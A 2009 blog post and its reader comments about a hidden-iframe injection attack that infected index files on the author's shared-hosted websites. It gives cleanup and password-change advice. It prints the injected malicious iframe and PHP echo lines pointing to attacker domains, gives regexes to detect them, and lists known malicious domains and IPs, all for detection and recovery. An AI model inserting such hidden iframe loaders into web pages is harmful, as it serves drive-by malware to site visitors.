[Updated on October 27, 2009 with new a version of the script]
It is a shame that after all those posts about security, some of my websites were under attack today.
Shoban and Anand emailed me about this today morning (Thanks guys) and I tried to understand what was going on. To my utter disbelief more than 10 websites hosted in the same server were affected by the attack.
All the index.* files in the server were infected with a piece of code that loaded a hidden iframe in the page.
To the html pages the following piece of code was added:
<iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
To php pages it added:
echo “<iframe src=\”http://goooogleadsence.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
Asha took the effort and cleaned most of the infected files. We are monitoring the status now.
How did the worm inject the hidden iframes to my files?
There are two ways through which the worm is believed to infect your files:
1) Server is compromised
This is the most common way. Some o the websites residing in the same web server as your website may be compromised (o it may be some vulnerabilities in your web application itself) that caused the web server to be compromised. Once the server is compromised, the worm will spread to all the websites in the server.
2) Client side FTP
The worm resides in some/any of the client side PCs you use for accessing the ftp/control panel accounts of your hosting server.
When you type in the username and password for the ftp/control panel account, the worm silently reads the credentials, accesses your ftp account and infects the files in the server. It adds the above mentioned code to all index.* files.
How can I recover from a hidden iframe injection attack?
Here are a few tips that might help you:
- The first thing to do to prevent these kinds of attacks is to change your ftp, control panel and database passwords as soon as possible.
- Notify your web host about the attack and advice them to take measures against a possible server wide attack.
- Change the file permissions in your server to the maximum secure mode.
- Download all your files from the server and check for infections. Clean the infected files.
- Using a good antivirus software, scan and clean every PC you use for logging into your hosting server.
- Never use public computers to access your server.
How do I clean infected files?
Use these regular expressions to search for all pages containig the malicious code and replace it with space:
<iframe src=\”http://[^"]*” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>
echo \”<iframe src=\\\”http://[^"]*\” width=1 height=1 style=\\\”visibility:hidden;position:absolute\\\”></iframe>\”;
You may have to write a script to automate this for all the files in the server.
I have cooked up a php script that can help you find out the infected files. Download the file from here, save it as clean.php (it is currently clean.php.txt) and upload it to the root folder of your website.
You may want to change some hardcoded values inside the file.
Then visit the url:
http://www.yourdomain.com/clean.php?c=iframe
The parameter c specifies the text to search for inside the file. The results will be something like:
It will search all the files in your website and if any of the files contains the given string, it will print the filename along with the number of occurrences of the string. In the above screenshot, you can see that one file is infected.
Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites. So as of now you will have to clean the files manually.
Faiz has written an advanced ASP.Net script for finding the infected files, and it can be found here.
Will my search engine rankings be affected by this attack?
Try to be fast with these steps because if a visitor see the message “This site may harm your computer” pop up when (s)he try to access your website/blog, (s)he may not return again. Remember that if the security of your website is compromised, it can affect the search engine rankings of the website. Besides, it may pave way for more sophisticated attacks.
Google will mark your site in it’s search results with a warning: “This site may harm your computer”.
Use the following link to see what google thinks about your website (give the url of your site instead of shopfloorbd.co.uk):
http://www.google.com/safebrowsing/diagnostic?site=http://shopfloorbd.co.uk
As mentioned above, you must remove the malware from your local machine using some antivirus software. AVG sees it as “Trojan Horse Downloader” and NOD32 sees it as “JS/Kryptik.B trojan”.
Note that when visiting an infected site, some antivirus softwares prompt you that “Trojan Horse Downloader”, an exe-file is trying to get loaded. Once the exe infects your machine, it will infect your server too.
Here are some more code samples caught from the wild:
<iframe src=”http://hostverify.net/?click=2730375″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
<iframe src=”http://hosttracker.net/?click=32431937″ width=1 height=1 style=”visibility:hidden;position:absolute”>
There are obfuscated versions of the attack code too:
<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){… etc.
Here is a list of some other websites that host malicious content:
gumblar.cn
martuz.cn
beladen.net
38zu.cn
googleanalytlcs.net
lousecn.cn
fqwerz.cn
d99q.cn
orgsite.info
94.247.2.0
94.247.2.195
http://mmsreader.com
http://google-ana1yticz.com
http://my2.mobilesect.info
http://thedeadpit.com
http://internetcountercheck.com
http://165.194.30.123
http://ruoo.info
gogo2me.net/
http://live-counter.net
http://klinoneshoes.info
protection-livescan.com/
http://webexperience13.com
http://q5x.ru
http://q5x.rugumblar.cnmartuz.cnbeladen.net38zu.cngoogleanalytlcs.netlousecn.cnfqwerz.cnd99q.cnorgsite.info94.247.2.094.247.2.195http://mmsreader.comhttp://google-ana1yticz.comhttp://my2.mobilesect.infohttp://thedeadpit.comhttp://internetcountercheck.comhttp://165.194.30.123http://ruoo.infogogo2me.net/http://live-counter.nethttp://klinoneshoes.infoprotection-livescan.com/http://webexperience13.comhttp://q5x.ru
If you find these urls in any code in your website, that is a sure shot sign that you are infected.
Is that the real URL? If so maybe consider adjusting it slightly so no-one accidentally goes to it and gets infected.
Let it be.
Some people are coming to this page from the search term “goooogleadsence.biz”. I hope this article will help them.
Anyway I have not provided any clickable links. So I think there is no harm. If you copy and paste the url to the address bar, you better know what you are doing.
Hey,
This totally happened to me and we are investigating the cause because it is a serious liability issue to us right now. Who is your hosting provider? Is it RackSpace?
Thanks,
Charles
We had this problem happen to us on the mosso rackspace servers…
@Anon @Charles .. Dont tell me that you are having this issues with Rackspace servers?
I thoght they are good compared to Cable and Wireless…. We have moved our company sites from C&W to Rackspace.
I don’t think the issue is with any specific hosting provider (unless they screwed up their passwords).
This worm infects the files if it some how managed to sniff your ftp/cpanel password. The best way to prevent the attack is to change your passwords frequently. Never login to your server ftp/cpanel accounts from public computers(or virus infected computers).
Did you ever get any answers from Mosso? Did they own up to this? We are having the same issue, changed passwords, reuploaded files to see what would happen and bam…string included again.
Nothing running on our site, just hosting files.
“changed passwords, reuploaded files to see what would happen and bam…string included again”
This is a sure shot indiation that the machine that you are using to access the server is infected by a spyware/malware.
So this is a new case, eh?
Thanks for the information. It’s really helpful..
I usually use password banks for my logins….
you might want to update the original post with how this worm operates for those coming thru searches.
Having the same problem with a lot of sites under our account with Dreamhost. I told them about the problem and it doesn’t appear they give too much of a damn.
Furthermore, there was a second attack where code pointing to a site hosted on the Dreamhost servers was the recipient of the iframe traffic. Can you believe that they asked me to contact the website owner myself and “discuss” it with him. Yea, coz he must be sooo upset about the extra 5-10K visits per day he’s getting!
Wankers
Spoke too soon – a rep contacted me and it looks like they’re gonna help out as much as they can.
Cool!
Hi,
This virus is not related to the host, but its related to client side malware.
This can be detected through Avast (try free version and it works well). This malware gets the ftp details from the session, connects the site you last connected through ftp, downloads index.* (index.html, index.htm, index.php, index.aspx etc), inserts the iframe code and finally uploads back to the server.
This malware can be detected by avas and your system will be free from that, but it doesnt cure the files on the server.
To cure files on the server, I am trying to write a script from past few days and seems its going to work fine, just fine-tuning the script as of now and will be releasing it soon.
The script is written in php file, so if you have php support on your server, this script is going to fix your problems.
Regards,
Dave.
Dave,
Let us know when the script is ready.
Hi,
We’ve got the same problem. It seems that one of our dev team have that malvare on their clients. They will clean it up tomorrow.
I have found this http://www.yourjoomlapro.com/ . Anyone bought that script? Seems to be from Dave who posted already something here (?).
Regards
Pippo
OK guys same problem bloody ass hole spyware see for your self
)
counterstrike.co.nz
Some one please help me
Guys, This is not host issue, what I believe is its client side worm,
I faced same problem with some of my old clients even very new client who just came for this ISSUE only
we found same iframes and today I just found this goooogleadsence code in iframe in one of my client’s website.
I myself cleaned many websites but it just comes in a very short time again..
I cleaned my machine its not infected but i found my office machines are infected with some worms, avats and NOD32 finds this well.
If you have nod32 or avast you won’t be able to open website, this anti virus will block website and warn you abut threat,
Etrust doen’t block website, it just let you go and open it. but doesn’t download the worm on your machine i guess…
wel there is no plenty of solution available yet as there are so many web onwers / developers faceting the same issue
my recent sites attacked are http://www.waytogrowrich.com and http://www.webtail.de
attack again and again…
Hi,
Have got the fix script ready, check at http://www.yourjoomlapro.com
Some more details here: http://blog.unmaskparasites.com/2009/01/14/gogo2me-hidden-iframe-injection/